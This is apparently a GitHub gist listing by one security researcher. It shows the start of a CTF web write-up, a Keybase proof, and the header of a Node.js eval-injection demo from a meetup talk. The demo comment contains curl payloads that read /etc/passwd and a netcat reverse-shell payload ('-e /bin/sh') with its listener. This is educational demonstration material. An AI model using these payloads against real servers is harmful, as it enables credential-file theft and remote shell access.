Renato Rodrigues Simpsonpt
Simpsonpt / h1-702-2018.md
Last active Mar 20, 2019
H1-702-CTF Write-up.

During the C-Days18 conference André (@0xACB) and Zé (@JLLiS) CTF junkies teased me to participate in H1CTF18. At first, I wasn't entirely convinced since it had already been running for a few days. Nevertheless, I decided to have a crack at it.

The web challenge starts with a simple visit to an endpoint on http://159.203.178.9/ that is running a webpage with the following title "Notes RPC Capture The Flag" and in the body " ...somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden."

Without a shadow of a doubt, I must find a way to interact with that note service.

1 - Recon Phase

As always, recon is the first thing to do. I started with the browser. After opening the page, I turned to the Network tab in the Developer Tools and went through the response headers, where I found "Apache/2.4.18 (Ubuntu)".

My first attempt was looking for "/server-status/" since the ([status

Simpsonpt / nodejs-ssjs-nodebleed.js
Created Mar 11, 2016
Demo from 0xOPOSEC Meetup - Node.js Problems in Paradise - http://slides.com/simpson/njs-problems-in-paradise
/**
* NodeBleed Original Bug: https://github.com/nodejs/node/issues/4660
* PoC: $ node nodejs-ssjs-nodebleed.js
* "Attack":
* - Direct Eval: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "res.end(require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'}))"
* - JSON Abuse: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":"1000",\"injection\":\"require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'})\"}"
* - NodeBleed: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":1000,\"injection\":\"\"}" | hexdump -C
*
* Insecure evals Payloads:
* - --data "{\"str\": \"1000\",\"injection\":\"require('child_process').exec('netcat -e /bin/sh IP 9999')\"}" ($ netcat -l -p 9999)

Keybase proof

I hereby claim:

  • I am simpsonpt on github.
  • I am simpson (https://keybase.io/simpson) on keybase.
  • I have a public key whose fingerprint is B26B 73BB 59DD E5A8 61C8 F93F 2891 9723 6299 DBBE

To claim this, I am signing this object:
